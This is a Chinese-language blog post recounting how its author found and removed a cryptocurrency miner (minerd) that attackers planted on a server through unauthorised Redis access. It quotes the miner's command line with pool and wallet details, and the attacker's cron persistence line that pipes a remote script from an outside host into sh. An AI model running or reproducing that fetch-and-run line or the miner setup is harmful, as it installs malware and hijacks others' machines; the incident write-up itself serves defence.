被黑客种下恶意程序的排除案例(minerd)

收到一条短信服务器CPU跑到了90%,赶紧登陆服务器top查看一下,这个叫minerd

的程序消耗这么多,这是个什么东西啊?

\

# find / -name minerd

/opt/minerd

# ls

KHK75NEOiq33 minerd

在opt目录下,并删除这两个文件

ps aux|grep minerd

SLsl Jul15 34:25 /opt/minerd -B -a cryptonight -ostratum+tcp://xmr.crypto-pool.fr:6666 -u48vKMSzWMF8TCVvMJ6jV1BfKZJFwNXRntazXquc7fvq9DW23GKkcvQMinrKeQ1vuxD4RTmiYmCwY4inWmvCXWbcJHL3JDwp-p x

杀掉这个进程

但是过了不到1分钟这个东西又出现了,会发现怎么删除这个东西都删不掉

然后赶紧看了下任务计划

#crontab -e

*/10 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh

不一会,opt下又出现了minerd这个程序

然后grep了下这个关键字查找下系统中的东西,果然,还有个配置文件

# grep -r "xmr.crypto-pool" /

/usr/local/etc/minerd.conf:-B -acryptonight -o stratum+tcp://xmr.crypto-pool.fr:8080 -u47TS1NQvebb3Feq91MqKdSGCUq18dTEdmfTTrRSGFFC2fK85NRdABwUasUA8EUaiuLiGa6wYtv5aoR8BmjYsDmTx9DQbfRX-p x

自己删除

这下看你还有不

卧槽,还有

我又继续过滤了下这个以配置文件为关键字的文件

\

果然,还有个伪装的程序

果断干掉

然后ps aux看下还在执行,直接杀掉

\

这下世界又恢复了宁静!

查看这个网址看了下,挖掘我的数据啊。

\

经排查是redis未授权导致






原文地址:http://qianxunclub.com/bei-hei-ke-chong-xia-e-yi-cheng-xu-de-pai-chu-an-li-minerd/
本文由 千寻啊千寻创作。可自由转载、引用,但需署名作者且注明文章出处。

上一篇 :   终于知道了酒干倘卖无暗示什么意思了!

下一篇 :   Redis与Hazelcast,在重负荷下的表现孰优孰劣?

热门评论